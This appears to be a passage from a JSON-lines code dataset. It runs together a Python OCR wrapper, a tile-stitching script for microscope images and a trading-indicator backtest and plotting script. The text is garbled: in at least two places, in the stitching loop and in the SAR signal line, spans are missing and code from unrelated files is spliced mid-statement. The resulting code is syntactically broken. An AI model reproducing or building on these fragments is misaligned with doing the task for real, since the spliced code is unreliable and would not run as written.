'https://drive.google.com/uc?id=13327Y1tz1ohsm5YZMyXVMPIOjoOA0OaA'\n config['cnn']['pretrained']=True\n config['device'] = 'cuda:0'\n config['predictor']['beamsearch']=False\n self.detector = Predictor(config)\n \n def predict(self,img):#cv2\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img)\n s = self.detector.predict(img)\n return s\n\n\nif __name__ == \"__main__\":\n x=OCR()\n img=cv2.imread(\"a.png\")\n s=x.predict(img)\n print(s)\n","sub_path":"Vocr.py","file_name":"Vocr.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"604765294","text":"import json\nfrom multiprocessing import Pool\nfrom concurrent.futures import ThreadPoolExecutor\nimport tifffile\nimport cv2\nimport numpy as np\nimport os\nimport sys\nimport math\n\n\n\n\n# p1='Tile06'\n# p2='Tile06'\n# left_up_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile06_YZ_MIP.tif'\n# right_down_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile07_YZ_MIP.tif'\n# tt_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile08_YZ_MIP.tif'\n# ttt_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile09_YZ_MIP.tif'\n# x_base = 0\n# y_base = 0\n# x_shift_range = 60\n# y_shift_range = 20\n\n\ndef get_shift(p1, p2, path1, path2, x_base, y_base, x_shift_range, y_shift_range):\n print(path1)\n print(path2)\n img1 = cv2.imread(path1, -1)\n img2 = cv2.imread(path2, -1)\n\n\n # print(img1.shape)\n #\n # mean = (np.mean(img1) + np.mean(img2))/2\n # print(mean)\n # mean = int(mean + 0.5*math.sqrt(np.sum(np.square(img1-mean)+np.square(img2-mean))/2/(img1.shape[0]*img1.shape[1])))\n # print(mean)\n #\n # cv2.threshold(img1, mean, 65535, cv2.THRESH_BINARY, img1)\n # cv2.threshold(img2, mean, 65535, cv2.THRESH_BINARY, img2)\n\n # img1_t = np.zeros(img1.shape,np.uint8)\n # img2_t = np.zeros(img2.shape, np.uint8)\n # cv2.threshold(img1,mean,255,cv2.THRESH_BINARY,img1_t)\n # cv2.threshold(img2,mean,255,cv2.THRESH_BINARY,img2_t)\n # cv2.imwrite(tt_path,img1_t)\n # img1_t_t = cv2.distanceTransform(img1_t,1,3)\n # img2_t_t = cv2.distanceTransform(img2_t,1,3)\n # cv2.imwrite(ttt_path, img1_t_t)\n # # cv2.threshold(img1,mean,1,cv2.THRESH_BINARY,img1_t)\n # # cv2.threshold(img2,mean,1,cv2.THRESH_BINARY,img2_t)\n # img1 = img1_t_t\n # img2 =img2_t_t\n # # img1 = img1_t\n # # img2 = img2_t\n # #img1 = img1 * img1_t * img1_t_t\n # #img2 = img2 * img2_t * img2_t_t\n # #img1 = (img1*65536/(np.max(img1)-np.min(img1))).astype(np.uint16)\n # #img2 = (img2 * 65536 / (np.max(img2) - np.min(img2))).astype(np.uint16)\n\n max = sys.maxsize\n loc = (0, 0)\n\n for i in range(-x_shift_range, x_shift_range+1):\n for j in range(-y_shift_range, y_shift_range+1):\n\n temp_loc_x = x_base + i\n temp_loc_y = y_base + j\n if temp_loc_x > 0:\n if temp_loc_y > 0:\n temp_l = img1[temp_loc_x:img1.shape[0], temp_loc_y:img1.shape[1]]\n temp_r = img2[0:img2.shape[0] - temp_loc_x, 0:img2.shape[1] - temp_loc_y]\n else:\n temp_l = img1[temp_loc_x:img1.shape[0], 0:img1.shape[1] + temp_loc_y]\n temp_r = img2[0:img2.shape[0] - temp_loc_x, -temp_loc_y:img2.shape[1]]\n else:\n if temp_loc_y > 0:\n temp_l = img1[0:img1.shape[0] + temp_loc_x, temp_loc_y:img1.shape[1]]\n temp_r = img2[-temp_loc_x:img2.shape[0], 0:img2.shape[1] - temp_loc_y]\n else:\n temp_l = img1[0:img1.shape[0] + temp_loc_x, 0:img1.shape[1] + temp_loc_y]\n temp_r = img2[-temp_loc_x:img2.shape[0], -temp_loc_y:img2.shape[1]]\n\n temp_max = np.sum(np.square(temp_l - temp_r)) / 1.0 / temp_l.shape[0] / temp_l.shape[1]\n # print(temp_max)\n # print((temp_loc_x, temp_loc_y))\n\n if temp_max < max:\n max = temp_max\n loc = (p1, p2, temp_loc_x, temp_loc_y)\n print(loc)\n return loc\n\n\n# a = get_shift(p1,p2,left_up_path, right_down_path, y_base, x_base, y_shift_range, x_shift_range)\n# print(a)\n\n\nif __name__ == '__main__':\n json_env = \"F:/ZhaoHuImages/AI_denoise/Zhaohu_StitchCode/tiles_position.json\" # 参数文件\n with open(json_env, 'r')as fp:\n json_data = json.load(fp)\n # print(json_data)\n input_folder = json_data['input_folder']\n xy_result_file = json_data['xy_result_file']\n locations = json_data['locations']\n # tiles_names = json_data['tiles_names']\n x_length = int(json_data['x_length'])\n y_length = int(json_data['y_length'])\n shift_x_P = int(json_data['shift_x_P'])\n shift_y_P = int(json_data['shift_y_P'])\n shift_x_P_d = int(json_data['shift_x_P_d'])\n shift_y_P_d = int(json_data['shift_y_P_d'])\n shift_x_P_d_ = int(json_data['shift_x_P_d_'])\n shift_y_P_d_ = int(json_data['shift_y_P_d_'])\n shift_z_P_d_ = int(json_data['shift_z_P_d_'])\n thread_num = int(json_data['thread_num'])\n locations = np.asarray(locations)\n\n json_env = 'F:/ZhaoHuImages/AI_denoise/Zhaohu_StitchCode/Z_shift.json'\n with open(json_env, 'r')as fp:\n json_data = json.load(fp)\n\n json_data = json_data[\"result_z_s\"]\n\n NNN = 201 # 共126层 源数据\n\n\n\n\n # p = Pool(thread_num)\n # res_l = []\n # for i in range(locations.shape[0]):\n # for j in range(locations.shape[1]):\n # if locations[i][j] != 'None':\n # if i < locations.shape[0] - 1 and locations[i + 1][j] != 'None':\n # res = p.apply_async(get_shift, args=(locations[i][j],\n # locations[i + 1][j],\n # input_folder + '/' + locations[i][\n # j] + '_' + 'XZ' + '_MIP_' + 'D.tif',\n # input_folder + '/' + locations[i + 1][\n # j] + '_' + 'XZ' + '_MIP_' + 'U.tif',\n # 0,\n # 0,\n # shift_z_P_d_,\n # shift_x_P_d_,))\n # res_l.append(res)\n # if j < locations.shape[1] - 1 and locations[i][j + 1] != 'None':\n # res = p.apply_async(get_shift, args=(locations[i][j],\n # locations[i][j + 1],\n # input_folder + '/' + locations[i][\n # j] + '_' + 'YZ' + '_MIP_' + 'R.tif',\n # input_folder + '/' + locations[i][\n # j + 1] + '_' + 'YZ' + '_MIP_' + 'L.tif',\n # 0,\n # 0,\n # shift_z_P_d_,\n # shift_y_P_d_,))\n # res_l.append(res)\n # result_z_s = []\n # for res in res_l:\n # result_z_s.append(res.get())\n\n p = Pool(thread_num)\n res_l = []\n\n\n\n for i in range(locations.shape[0]):\n for j in range(locations.shape[1]):\n if locations[i][j] != 'None':\n # print(input_folder+'/'+'Region 1_'+locations[i][j]+'_z100_RAW_ch00.tif')\n if i df.HA_open, 1, -1)\n# ema21HA = df['EMA_21HA'] = ta.ema( df.HA_close, length=21, append=True)\nema9 = df.ta.ema(length=9, append=True)\nema21 = df.ta.ema(length=21, append=True)\nema42 = df.ta.ema(length=42, append=True)\nema50 = df.ta.ema(length=50, append=True)\nema100 = df.ta.ema(length=100, append=True)\nema150 = df.ta.ema(length=150, append=True)\nkeltner = df.ta.kc(append=True)\npsar = df.ta.psar( append=True)\nsar = df['SAR'] = ft.TA.SAR(df)\ndf['signal_SQ2gauss']= ft.TA.SQZMI(df).apply(lambda x: -1 if x else 0)\ndf['signal_trTTM'] = df.ta.ttm_trend(append=True)\n\n# df['signal_decreasing'] = df.ta.decreasing(length=8).apply(lambda x: -1 if x==1 else x)\n# df['signal_increasing'] =df.ta.increasing(length=8)\nlength = 3\ndf['signal_IDClose'] = df.ta.decreasing(close=df.HA_close, length=length, strict=True).apply(lambda x: -1 if x==1 else x) + df.ta.increasing(close=df.HA_close,length=length, strict=True)\ndf['signal_IDhigh'] = df.ta.decreasing(close=df.HA_high, length=length, strict=True).apply(lambda x: -1 if x==1 else x) + df.ta.increasing(close=df.HA_high,length=length, strict=True)\n\n# Exit Chandelier\nchandelier = ft.TA.CHANDELIER(df, long_period=15, short_period=15)\ndf['chxLong'], df['chxShort'] = chandelier['Long.'], chandelier['Short.']\ndf['chxLong'] = np.where(df['chxLong'] >= df['close'], np.NaN, df['chxLong'])\ndf['chxShort']= np.where(df['chxShort'] < df['close'], np.NaN, df['chxShort'])\ndf['signal_sChandelierS'] = np.where(df['chxShort'] > 0, -1, 1) # first hint of red\n# df['signal_chandelierL'] = np.where(df['chxLong'] > 0, 1, -1)\n\n\n# New Squeeze (black dots) : 1 = ON, 0 = OFF (for 'in_squeeze')\ndef in_squeeze(df):\n if df['BBL_5_2.0'] > df['KCLe_20_2'] and df['BBU_5_2.0'] < df['KCUe_20_2'] :\n return 1\ndef out_squeeze(df):\n if not (df['BBL_5_2.0'] > df['KCLe_20_2'] and df['BBU_5_2.0'] < df['KCUe_20_2']):\n return 1\ndf['squeeze_on'] = df.apply(in_squeeze, axis=1)\ndf['squeeze_off'] = df.apply(out_squeeze, axis=1)\n\n\nmpfdf_columns = list(df.columns)\n\n################################# MAIN AlGO and SIGNAL GENERATION #####################################\n\n# add psar signal -1 0 +1\ndf['signal_lsPSAR'] = df['PSARl_0.02_0.2'].apply(lambda x: 1 if x>0 else -1)\ndf['rPSAR'] = df['PSARr_0.02_0.2'].apply(lambda x: -8 if x==True else 0)\n\ndef rPSAR (df):\n if df['PSARl_0.02_0.2'] > 0 and df['PSARr_0.02_0.2'] : return 9\n elif df['PSARs_0.02_0.2'] > 0 and df['PSARr_0.02_0.2'] : return -9\n else : return 0\n\ndf['signal_rPSAR'] = df[['PSARl_0.02_0.2', 'PSARs_0.02_0.2', 'PSARr_0.02_0.2' ]].apply(rPSAR, axis=1)\n# df[['signal_rPSAR', 'signal_rPSAR']].tail(50)\n\ndf['signal_sSAR'] = np.where (df['SAR'] df.EMA_21) &\n (df.EMA_21 > df.EMA_50) &\n (df.EMA_50 > df.EMA_100) &\n (df.EMA_100 > df.EMA_150)\n ,1, np.where(\n (df.EMA_9 < df.EMA_21) &\n (df.EMA_21 < df.EMA_50) &\n (df.EMA_50 < df.EMA_100) &\n (df.EMA_100 < df.EMA_150), -1, 0))\n\n# define stack EMA Softer:base=21 :: +1: positive bullish, 0:undecided, -1:negative bearish\ndf['signal_StackEMA21'] = np.where(\n # (df.EMA_9 > df.EMA_21) &\n (df.EMA_21 > df.EMA_50) &\n (df.EMA_50 > df.EMA_100) &\n (df.EMA_100 > df.EMA_150)\n ,1, np.where(\n # (df.EMA_9 < df.EMA_21) &\n (df.EMA_21 < df.EMA_50) &\n (df.EMA_50 < df.EMA_100) &\n (df.EMA_100 < df.EMA_150), -1, 0))\n\n## >>>>>>>>>> generate long signal :\n# find 1st change Entry from day1: 0->1 and day2: reconfirmation 1->1 ; Exit 1->0\n\ndf.loc [ ((df['signal_StackEMA'] == 1) & (df['signal_StackEMA'].shift(2) == 0) & (df['signal_StackEMA'].shift(1) == 1)) , 'signalxTrade_StackEMA'] = 1\ndf.loc [ ((df['signal_StackEMA'] == 0) & (df['signal_StackEMA'].shift(1) == 1) ) , 'signalxTrade_StackEMA'] = -1\n# df.loc [ ((df['signal_StackEMA'] == 0) & (df['signal_StackEMA'].shift(2) == 1) & (df['signal_StackEMA'].shift(1) == 0)) , 'signal'] = -1\n## See results:\ndf[ (df.signalxTrade_StackEMA == 1) | (df.signalxTrade_StackEMA == -1)] [['signalxTrade_StackEMA', 'close']]\n\n# df['signal'] = ((df['signal_StackEMA'] == 1) & (df['signal_StackEMA'].shift(2) == 0) & (df['signal_StackEMA'].shift(1) == 1)) # return on DF bool\n\n\n########################### BACK TEST ###########################\n\n## >>>>>>>>>> Run a Back Test and Display results :\ndef BackTester_Long (dfr, signal_col): # Entry +1 : Exit -1 ; Hold = 0 or None\n\n df = dfr.copy() # create copy or else will rename original column name\n df.rename(columns = { signal_col: 'signal' }, inplace = True)\n\n sessionpoints = np.where((df.signal == 1) | ( df.signal==-1))\n # sessionpoints = df.loc[(df.signal == 1) | ( df.signal==-1)]\n ## check df consistency: df.iloc[sessionpoints][['signal', 'close']]\n\n in_sessionLong = False;\n start_long = None\n start_long_date = None\n exit_long = None\n exit_long_date = None\n\n analysisDF = pd.DataFrame(columns = ['En', 'Ex', 'EnPrice','ExPrice', 'ReturnPer' ])\n\n for item in sessionpoints[0] :\n close_price = df.iloc[item].close\n signal = df.iloc[item].signal\n if (not in_sessionLong) and signal == 1:\n in_sessionLong = True\n start_long = close_price\n start_long_date = df.index[item]\n\n\n elif in_sessionLong and signal == -1 :\n exit_long = close_price\n exit_long_date = df.index[item]\n per_return = 100*(exit_long - start_long )/start_long\n delta_days = (exit_long_date - start_long_date)\n\n analysisDF = analysisDF.append ({\n 'En' : start_long_date,\n 'Ex' : exit_long_date,\n 'EnPrice' : start_long,\n 'ExPrice' : exit_long,\n 'ReturnPer' : per_return,\n 'days' : delta_days\n # , 'Signal': signal\n }, ignore_index=True)\n\n # reset vars\n in_sessionLong = False;\n start_long = None\n start_long_date = None\n exit_long = None\n exit_long_date = None\n\n print(analysisDF)\n return analysisDF\n\n\nanalysisDF = BackTester_Long(df, 'signalxTrade_StackEMA')\n\n\n\n\n################################### PLOT TTM SQUEEZE & EMA21 ###################################\n\n\ndef long_signal_entry(signal_series, df):\n\n if signal_series.isnull().values.all() or (1 not in list(signal_series)) : return []\n\n signal = []\n yrange = max(df['high']) - min(df['low'])\n offset = yrange * 0.10 # 2% of range\n for date,value in signal_series.iteritems():\n if value == 1: # buy\n signal.append(df.loc[date].low - offset ) # Put ^ marker below lows\n else:\n signal.append(np.nan)\n return signal\n\n\ndef long_signal_exit(signal_series, df):\n\n if signal_series.isnull().values.all() or (-1 not in list(signal_series)) : return []\n\n signal = []\n yrange = max(df['high']) - min(df['low'])\n offset = yrange * 0.10 # 2% of range\n for date,value in signal_series.iteritems():\n if value == -1: # exit\n signal.append(df.loc[date].high + 1.5 * offset) # Put 'v' marker above highs\n else:\n signal.append(np.nan)\n return signal\n\n\ndef get_reversals(signal_series, df):\n\n if signal_series.isnull().values.all() : return [], []\n\n signal = []\n markercolor = []\n yrange = max(df['high']) - min(df['low'])\n offset = yrange * 0.10 # 2% of range\n for date,value in signal_series.iteritems():\n if value == -9: # reversal bear\n signal.append(df.loc[date].high + 1.5 *offset ) # Put o marker above highs 2x\n markercolor.append('red')\n\n elif value == 9: # reversal bull\n signal.append(df.loc[date].high + 1.5* offset ) # Put o marker above highs 1x\n markercolor.append('green')\n else:\n signal.append(np.nan)\n markercolor.append('None')\n\n return signal, markercolor\n\n\ndef get_sessions_long(analysisDF, df):\n df = df.copy()\n sessions = []\n sessioncolors = []\n sessionReturns = []\n df['ReturnPlaceholder'] = np.nan\n df['ReturnMarker'] = None\n\n yrange = max(df['high']) - min(df['low'])\n # offset = yrange * 0.10 # 2% of range\n\n print ('received range', df.index[0], df.index[-1])\n print ('df length', len(df))\n\n dfRange = df.index[0], df.index[-1]\n\n for i in analysisDF.itertuples():\n # Examaple seq of points\n # [('2021-03-22',25),('2021-03-29',25)] # test\n en, ex, ret = i.En, i.Ex, i.ReturnPer\n # print (en,ex,ret)\n\n if ( en>=dfRange[0] and ex<=dfRange[1]):\n pmax = max( df[en : ex].high )\n pmin = min( df[en : ex].low )\n\n # value = pmax + 0.1 * ( pmax - pmin) # 10% above high to low range\n value = pmax + yrange*0.05 # 10% offset\n\n sessions.append([(en, value), (ex,value)])\n sessioncolors.append ('green' if ret > 0 else 'red' )\n # sessionReturns.append(ret)\n df.loc[ex, 'ReturnMarker'] = '$+' + str ( round(ret,1)) + '$' if ret > 0 else '$' + str ( round(ret,1)) + '$'\n\n df.loc[ex, 'ReturnPlaceholder'] = pmax + + yrange*0.10\n # print (en,ex,ret, value)\n\n # for date,value in signal_series.iteritems():\n # if value == -1: # buy\n # signal.append(price[date]*1.01) # Put marker below\n # else:\n # signal.append(np.nan)\n sessionReturns = df[['ReturnPlaceholder', 'ReturnMarker']]\n # print (sessionReturns) # check return marker dataframe # test\n return sessions, sessioncolors, sessionReturns\n\n\n# mpf.plot()\ndef plot (df, start=-100, end=None, ctype='candle', analysis=None, addSignal=False, addAlgo=False, session=False, ha=False, signal='signalxTrade_StackEMA') :\n\n # taplots = []\n # taplots +=\n # Lets start with a simple chart\n\n # mpfdf = df[-500:-450]\n mpfdf = df[start:end]\n\n apsq = []\n\n #### >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD Indicators (Panel 0) ####################################\n\n\n markersize = 2 if len(mpfdf) > 50 else 5\n apsq = [\n # EMA42 ref\n mpf.make_addplot(mpfdf['EMA_42'], type = \"scatter\", color='skyblue', markersize=markersize), # 1D 21 EMA uses panel 0 by default\n\n # EMA21 ref\n mpf.make_addplot(mpfdf['EMA_21'], type = \"scatter\", color='blue', markersize=markersize), # uses panel 0 by default\n # mpf.make_addplot(mpfdf['EMA_21HA'], color='blue'), # uses panel 0 by default\n ]\n\n # # if PSAR enabled : draw lines\n # apsq += [\n # # psar\n # mpf.make_addplot(mpfdf['PSARl_0.02_0.2'], color='pink', markersize=markersize, width=1), # uses panel 0 by default\n # mpf.make_addplot(mpfdf['PSARs_0.02_0.2'], color='orange', markersize=markersize, width=1), # uses panel 0 by default\n # ]\n\n # # if PSAR enabled : draw lines\n # apsq += [\n # # psar\n # mpf.make_addplot(mpfdf['SAR'], type = \"scatter\", color='pink', markersize=markersize, width=1), # uses panel 0 by default\n # ]\n\n # # if Chandelier Ex enabled : draw lines\n # apsq += [\n # # chandelier Exit\n # mpf.make_addplot(mpfdf['chxLong'], color='green', markersize=markersize, width=1), # uses panel 0 by default\n # mpf.make_addplot(mpfdf['chxShort'], color='red', markersize=markersize, width=1), # uses panel 0 by default\n # ]\n\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD signal if addSignal = True (Panel 0) ############### >>>>>>>>>>>>>>>>>>>>>>>\n\n longEntry = long_signal_entry(mpfdf[signal], mpfdf)\n longExit = long_signal_exit(mpfdf[signal], mpfdf)\n\n # print ('Long Entry : ', longEntry)\n # print ('Long Exit : ', longExit)\n\n if ( longEntry and longExit) :\n apsq += [\n # add long entry\n mpf.make_addplot(longEntry ,type='scatter', color='purple', markersize=40, marker='^'),\n # add long exit\n mpf.make_addplot( longExit ,type='scatter', color='black', markersize=40, marker='x')\n ]\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD STOPS (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n # todo\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD SR levels (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n # todo\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD TRADE SESSIONS (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD Reversal indicator (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n d, markercolor = get_reversals(mpfdf['signal_rPSAR'], mpfdf)\n # print (len(d), len(mpfdf['signal_rPSAR']), len(mpfdf['signal_rPSAR']))\n # print (d)\n # print (markercolor)\n # print (mpfdf['signal_rPSAR'].tolist())\n if d : # check has values\n # mymarkers = d.ReturnMarker.tolist()\n apsq += [\n # add texts using markers to annotate\n # mpf.make_addplot( d, type='scatter',marker='o',markersize=5,color='black')\n mpf.make_addplot( d, type='scatter',marker='o',markersize=5,color=markercolor)\n ]\n\n # add sessions if addsession = True\n # seq_of_points=[('2021-03-22',25),('2021-03-29',25)] # test\n seq_of_points, seq_colors, seq_Returns = get_sessions_long(analysisDF, mpfdf) # draw session lines\n # mpf.plot(df,alines=dict(alines=seq_of_points)) # test\n # print ('Trade Area', seq_of_points)\n\n d = seq_Returns\n if not d.ReturnPlaceholder.isnull().values.all() :\n mymarkers = d.ReturnMarker.tolist()\n apsq += [\n # add texts using markers to annotate\n mpf.make_addplot( d.ReturnPlaceholder, type='scatter',marker=mymarkers,markersize=200,color='pink')\n ]\n # mpfchart[\"plot_ratios\"] += common_plot_ratio # Required to add a new Panel\n\n\n\n ######################### Squeeze plots (Panel 1) default #############################\n\n # make same as TOS colors # order is important\n data = []\n alpha = []\n for i in [-3, -4, -2, -1, 4, 5 ] : # maintain order\n d = mpfdf[squeezes.columns[i]]\n # if np.isnan(np.sum(np.asarray(d))) :\n if d.isnull().values.all() :\n d = d.fillna(0)\n print (\"All Null/NAN : \", squeezes.columns[i])\n alpha += [0.0] # make invisible\n print (squeezes.columns[i], 'modified')\n else :\n alpha += [0.3]\n\n # alpha += [0.5]\n data += [d]\n # print (d)\n # print (\"isnull\", squeezes.columns[i], d.isnull().values.all())\n\n # set ylim\n ylim = (min(mpfdf[squeezes.columns].min())*1.02, max(mpfdf[squeezes.columns].max()*1.02))\n\n apsq += [\n # Note order is important here\n mpf.make_addplot(data[0], secondary_y=False, type=\"bar\", color=\"blue\", alpha=alpha[0], panel=1, ylim=ylim),\n mpf.make_addplot(data[1], secondary_y=False, type=\"bar\", color=\"deepskyblue\", alpha=alpha[1], panel=1, ylim=ylim),\n mpf.make_addplot(data[2], secondary_y=False, type=\"bar\", color=\"red\", alpha=alpha[2], panel=1, ylim=ylim),\n mpf.make_addplot(data[3], secondary_y=False, type=\"bar\", color=\"yellow\", alpha=alpha[3], panel=1, ylim=ylim),\n\n # mpf.make_addplot(mpfdf['close'], color=\"black\", panel=1),\n mpf.make_addplot(data[4], secondary_y=False, color=\"green\",alpha=alpha[4], panel=1, ylim=ylim, width=2),\n mpf.make_addplot(data[5], secondary_y=False, color=\"red\", alpha=alpha[5], panel=1, ylim=ylim, width=2)\n ]\n\n\n # squeeze metrics original flavor\n d = mpfdf['SQZ_OFF'].apply(lambda x: 0 if x==1 else np.nan)\n if not d.isnull().values.all() :\n # print (d)\n apsq += [mpf.make_addplot(d , secondary_y=False, scatter=True, markersize=20, marker='o',color=\"lime\", panel=1)]\n\n d = mpfdf['SQZ_ON'].apply(lambda x: 0 if x==1 else np.nan)\n if not d.isnull().values.all() :\n # print (d)\n apsq += [mpf.make_addplot(d, secondary_y=False, scatter=True, markersize=20, marker='o', color=\"red\", panel=1)]\n\n d = mpfdf['squeeze_on'].apply(lambda x: 0 if x==1 else np.nan)\n if not d.isnull().values.all() :\n # print (d)\n apsq += [mpf.make_addplot(d, secondary_y=False, scatter=True, markersize=2, marker='o', color=\"black\", panel=1)]\n # mpf.make_addplot(mpfdf[squeezes.columns[3]], scatter=True,markersize=20,marker='o',color=\"skyblue\", panel=2),\n\n # mpf.make_addplot(mpfdf['squeeze_on'].apply(lambda x: -2 if x==0 else None), scatter=True,markersize=10,marker='o', color=\"black\", panel=1),\n # mpf.make_addplot(mpfdf['squeeze_off'].apply(lambda x: -2 if x==0 else None), scatter=True,markersize=10,marker='o', color=\"lime\", panel=1),\n\n\n # mpf.make_addplot(long_signal_entry(mpfdf[signal], mpfdf.low) ,type='scatter', color='purple', markersize=15, marker='^'),\n # # add long exit\n # mpf.make_addplot(long_signal_exit(mpfdf[signal], mpfdf.high) ,type='scatter', color='magenta', markersize=15, marker='v'),\n\n\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD Algo if addAlgo=True (Panel 2) >>>>>>>>>>>>>>>>>>>>>>>>>>\n\n # All scatter plot in a single line\n signalCols = sorted ([col for col in mpfdf if col.startswith('signal')])\n signalDF = mpfdf[signalCols]\n ylimSignal = len(signalCols)*0.5+1 # add bottom and top row for buffer to view markers\n counter = 0.5\n\n # add base at 0\n apsq += [mpf.make_addplot(mpfdf[signalCols[0]].apply(lambda x:0), scatter=True, alpha=0, panel=2, secondary_y=False, ylim=(0,ylimSignal), ylabel='Signals')]\n\n # define markersize\n l = len(mpfdf)\n markersize = 5 if l > 150 else 20\n for col in signalCols :\n d = mpfdf[col].copy()\n if not d.isnull().values.all() : # check if a null array\n # print (d)\n\n # IF signalxtrade indicator\n if (col.startswith('signalxTrade')) :\n mymarkercolor = d.apply(\n lambda x: 'purple' if x==1 else ('red' if x==-1 else\n 'yellow' if (x==-2 or x==2) else 'lightgray')).tolist()\n mymarker = d.apply(\n lambda x: '^' if x==1 else ('x' if x==-1 else\n 'o' if (x==-2 or x==2) else 'None')).tolist()\n mydata = d.apply( lambda x: counter )\n apsq += [mpf.make_addplot(mydata, scatter=True, markersize=markersize, marker=mymarker, color=mymarkercolor, panel=2, secondary_y=False, ylim=(0,ylimSignal))]\n\n\n # IF only signal indicator\n else:\n mymarkercolor = d.apply(\n lambda x: 'limegreen' if x==1 else ('red' if x==-1\n else 'yellow' if (x==-2 or x==2)\n else ( 'black' if x ==-8\n else ( 'green' if x== 9\n else ('red' if x == -9\n else 'lightgray'))))).tolist()\n mydata = d.apply( lambda x: counter )\n apsq += [mpf.make_addplot(mydata, scatter=True, markersize=markersize, marker='o', color=mymarkercolor, panel=2, secondary_y=False, ylim=(0,ylimSignal))]\n # print (mydata) # test\n # print (mymarkercolor) # test\n\n counter +=0.5\n\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Show HA is HA = True\n final_df = mpfdf # placeholder\n\n if ha :\n # If HA HeikinAski Charts Enabled ; else remove section\n ## Generate the HA columns and rename to OHLC\n final_df = mpfdf[['HA_open', 'HA_high', 'HA_low', 'HA_close']].copy()\n final_df.columns = ['open', 'high', 'low', 'close']\n # mpf.plot(df2, type='candle', style='yahoo')\n\n\n import matplotlib.dates as mdates\n import matplotlib.ticker as mticker\n from matplotlib.ticker import AutoLocator, MultipleLocator\n\n # fig.tight_layout(h_pad= -1.6)\n\n # fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False,panel_ratios=(6,2), datetime_format=' %m/%d',xrotation=45, returnfig=True)\n\n\n # fig, axlist = mpf.plot(final_df, type=ctype, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo',datetime_format=' %b-%d',xrotation=90, returnfig=True, alines=dict(alines=seq_of_points))\n\n # mpf.plot(final_df, type=ctype,addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo',)\n\n # fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False, panel_ratios=(6,2), datetime_format=' %b-%d',xrotation=90, returnfig=True, alines=dict(alines=seq_of_points, colors=seq_colors, linewidths=2,))\n\n # yrange = max(mpfdf['high']) - min(mpfdf['low'])\n # offset = yrange * 0.02 # 2% of range\n\n # fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False, panel_ratios=(6,2), datetime_format=' %b-%d',xrotation=90, returnfig=True, )\n ## tight_layout=Truex, ylim = ( min(mpfdf['low'] - + yrange * 0.1), max(mpfdf['high']) + yrange * 0.1)\n\n # Add Algo Panel # if addAlgo=True\n fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False, panel_ratios=(6,2,4), datetime_format=' %b-%d',xrotation=90, returnfig=True, alines=dict(alines=seq_of_points, colors=seq_colors, linewidths=2,))\n\n\n\n # print (axlist)\n ax1 = axlist[1] # Panel 0\n # ax1.set_ylim( max(mpfdf['high']) + yrange * 0.1, min(mpfdf['low'] - + yrange * 0.1))\n ax2 = axlist[2] # Panel 2\n\n ##>>>>>>>>>>>>>>> Ytick Markers for Algo Names #########################\n ax3 = axlist[-2] # Panel 1\n counter = 0.5\n yticks = list(np.arange (0.5, 0.5*(1+len(signalCols)), 0.5))\n # signalCols # replace prefix signal_ - clean look\n signalCols_n = [sub.replace('signalx', '') for sub in signalCols]\n signalCols_n = [sub.replace('signal_', '') for sub in signalCols_n]\n print (len(yticks), len(signalCols))\n # axs = for i in axlist i.ylable=\"signal\"\n ax3.set_yticks(yticks)\n ax3.set_yticklabels(signalCols_n, fontdict={'fontsize': 8})\n\n\n # for col in signalCols :\n # ax3.text(y=counter, x=ax3.get_xlim()[0]*0.9, s=col, alpha=0.7, color='b')\n # counter += 0.5\n\n\n\n # ax2.set_ylim(min(mpfdf[squeezes.columns].min()), max(mpfdf[squeezes.columns].max()))\n ax1.minorticks_on()\n ax1.tick_params(axis='x',which='minor',direction='out',color='b',labelsize=3,labelcolor='g')\n ax1.xaxis.set_minor_locator(MultipleLocator(1))\n # if (len(mpfdf) <=50) :\n # ax1.xaxis.set_major_locator(MultipleLocator(2))\n # elif (len(mpfdf) <=100):\n # ax1.xaxis.set_major_locator(MultipleLocator(3))\n\n\n # plt.rcParams['xtick.major.size'] = 8\n # plt.rcParams['xtick.minor.size'] = 4\n # plt.rcParams['xtick.label.size'] = 4\n # ax1.tick_params(axis='x', which='both',labelbottom= False, labeltop=False )\n # ax1.tick_params(axis='x', which='minor', pad = 2)\n # ax1.grid(which='major',color='k')\n # ax1.grid(which='minor',color='gray')\n\n # base = len(final_df)\n\n # ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n # # ax1.xaxis.set_major_locator(mticker.IndexLocator(base=base/10, offset=0))\n # 